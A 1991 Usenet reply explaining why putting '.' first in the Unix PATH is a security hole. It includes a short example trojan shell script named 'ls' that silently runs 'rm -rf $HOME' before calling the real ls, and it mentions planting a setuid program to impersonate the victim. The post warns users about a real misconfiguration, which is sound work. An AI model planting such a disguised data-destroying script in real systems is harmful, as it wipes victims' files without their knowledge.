Path: utzoo!utgpu!news-server.csri.toronto.edu!cs.utexas.edu!wuarchive!sdd.hp.com!spool.mu.edu!snorkelwacker.mit.edu!bloom-picayune.mit.edu!athena.mit.edu!jik
From: jik@athena.mit.edu (Jonathan I. Kamens)
Newsgroups: comp.unix.questions
Subject: dot in path
Message-ID: <1991Feb22.040932.29714@athena.mit.edu>
Date: 22 Feb 91 04:09:32 GMT
References: <1991Feb22.004010.13359@zip.eecs.umich.edu>
Sender: news@athena.mit.edu (News system)
Organization: Massachusetts Institute of Technology
Lines: 33

In article <1991Feb22.004010.13359@zip.eecs.umich.edu>, bguthy@amazon.eecs.umich.edu (Bala S. Guthy) writes:
|> Hello, I remember when I first learnt Unix, the instructor said,
|> that "."  should never be the first thing in one's $path. It had
|> something to do with a security hole in Unix. Does anyone know
|> what and if there is any disadvantage to having "." as the first
|> entry in $path.

  Because if you cd into a directory in which someone else has placed a trojan
horse named the same as a common system utility, and then run that utility,
then you're actually running the trojan horse.

  Example: I create a shell script in my home directory called "ls" which does
this:

    #!/bin/sh

    nice /bin/sh -c "rm -rf $HOME &"

    exec /bin/ls $*

You cd into my home directory out of curiosity and type "ls".  You're scrod. 
You might not even notice that your files are disappearing.

  Alternatively, I could make my trojan horse create a program that is setuid
to you that I can run at my leisure to become you.

  You get the idea, I hope.

-- 
Jonathan Kamens			              USnail:
MIT Project Athena				11 Ashford Terrace
jik@Athena.MIT.EDU				Allston, MA  02134
Office: 617-253-8085			      Home: 617-782-0710